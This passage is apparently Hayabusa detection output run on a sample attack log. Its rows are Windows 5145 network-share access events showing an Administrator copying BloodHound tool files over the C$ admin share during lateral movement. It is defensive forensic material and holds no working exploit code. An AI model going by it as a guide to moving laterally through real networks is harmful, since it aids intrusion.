: Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip : IP Address: 
10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share 
File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: 
\\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx +2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts : IP Address: 